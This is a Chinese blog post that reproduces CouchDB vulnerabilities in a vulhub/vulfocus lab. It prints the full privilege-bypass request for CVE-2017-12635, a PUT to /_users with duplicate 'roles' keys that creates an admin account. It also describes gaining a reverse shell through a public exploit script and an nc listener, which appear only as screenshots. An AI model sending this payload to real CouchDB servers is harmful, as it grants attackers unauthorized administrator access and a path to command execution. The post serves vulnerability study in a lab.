CouchDB漏洞复现

已于 2022-10-07 18:24:48 修改
阅读量792 收藏
点赞数
分类专栏: 漏洞复现 文章标签: couchdb 安全 web安全
于 2022-10-07 17:52:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44259979/article/details/127196246
版权

CouchDB漏洞复现在vulfocus环境下

一、漏洞复现地址如下:
https://vulfocus.cn/
二、CouchDB复现权限绕过(CVE-2017-12635)
小于 1.7.0 以及 小于 2.1.1
可绕过创建权限而去实现任意创建admin权限的账号 实现登录。
1、正常创建数据包(发现无权限)
在这里插入图片描述2、绕过权限数据包

PUT /_users/org.couchdb.user:vulhub

{

  "type": "user",

  "name": "vulhub",

  "roles": ["_admin"],

  "roles": [],

  "password": "vulhub"

}

在这里插入图片描述3、成功实现绕过,到/_utils 目录下验证登陆。
三、CouchDB复现权限绕过(CVE-2017-12635)
实现权限绕过 并成功登录admin账号后,可实现此漏洞实现rce。直接使用了网上SF的exp脚本反弹shell如下:
在这里插入图片描述这个环境换到了本地搭建的vulhub。
攻击机nc监听,直接执行脚本文件:
在这里插入图片描述

SNA1L1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Couchdb 任意命令执行漏洞(CVE-2017-12636)
锋刃科技的博客
05-06 3438
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 影响版本 小于 1.7.0 以及 小于 2.1.1 环境搭建 https://githu...
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
一枚不知名的Java程序猿
10-02 960
vulhub漏洞学习过程
Couchdb 任意命令执行漏洞(CVE-2017-12636)
weixin_44311721的博客
07-30 1432
Couchdb 任意命令执行漏洞(CVE-2017-12636) Couchdb简介: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的...
未授权访问:CouchDB 未授权访问漏洞
最新发布
qq_68163788的博客
05-18 461
Apache CouchDB是一个开源数据库,应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。 其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问。
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
include_voidmain的博客
07-14 2558
CVE-2022-24706 Apache CouchDB 远程命令执行漏洞
利用Vulnhub漏洞 - Couchdb 任意命令执行漏洞(CVE-2017-12636)
07-17 394
漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15...
apache-couchdb-2.3.1.zip
09-10
Apache CouchDB是一个开源的、基于文档的分布式数据库系统,它采用了JSON作为数据格式,并使用JavaScript进行查询和数据处理。在2.3.1版本中,CouchDB继续提供了一流的可扩展性和灵活性,适用于各种应用程序,特别是...
CouchDB,Python
10-28
CouchDB是一款开源的、基于文档的分布式数据库系统,它以JSON格式存储数据,并使用JavaScript作为查询语言。Python中的CouchDB模块是Python与CouchDB服务器交互的接口,允许开发者使用Python编写代码来操作CouchDB...
CouchDB20 分钟入门
01-11
学习couchDB 的入门教程
couchdb-2.3.0.msi
12-16
couchdb-2.3.0.msi,在window下的安装包,下载后就可以直接运行。详细见https://blog.csdn.net/qq_30505673/article/details/85039731
13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2024-12636)
04-16 819
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
【vulhub】Couchdb 任意命令执行漏洞(CVE-2017-12636)
qq_45300786的博客
09-14 647
特征 特征请参考我的上一篇帖子 【vulhub】Couchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞 影响版本:小于 1.7.0 以及 小于 2.1.1 注:中的很多东西也要用到这篇帖子,所以先看这篇 【vulhub】Couchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞 再来看本篇帖子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 本次是用的版本1.6 http://192.168.1
couchdb 垂直权限绕过漏洞(cve-2017-12635)
whatday的专栏
06-08 786
Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和Ja
CouchDB 漏洞 CVE-2017-12635/12636
sechelper的博客
02-11 375
CouchDB的CVE-2017-12635和12636联合利用,详细漏洞,exp下载获取
漏洞----50、Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
七天
07-08 1580
Couchdb 垂直权限绕过漏洞(CVE-2017-12635)
CouchDB常用的漏洞利用方法
05-27
以下是一些常用的 CouchDB 漏洞利用方法: 1. 未授权访问漏洞:如果 CouchDB 未正确配置,攻击者可以轻易地访问和控制 CouchDB 服务器,从而获取敏感信息或造成破坏。 2. 认证绕过漏洞:攻击者可以利用某些漏洞或弱口令等方式,绕过身份验证机制,从而访问和控制 CouchDB 服务器。 3. 注入漏洞:攻击者可以向 CouchDB 服务器发送恶意数据,利用注入漏洞,执行任意代码,从而控制服务器。 4. 配置错误漏洞:如果 CouchDB 服务器的配置存在错误,攻击者可以利用这些错误,绕过安全措施,访问和控制 CouchDB 服务器。 5. 拒绝服务攻击漏洞:攻击者可以通过发送大量的恶意请求,或利用某些漏洞,让 CouchDB 服务器崩溃或无法响应,从而导致服务停止或数据丢失。 总之,为了保护 CouchDB 服务器的安全,需要加强对服务器的安全管理和监控,及时修补安全漏洞,提高人员的安全意识和技能。此外,建议使用更加安全的身份验证机制,例如 OAuth、LDAP 等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值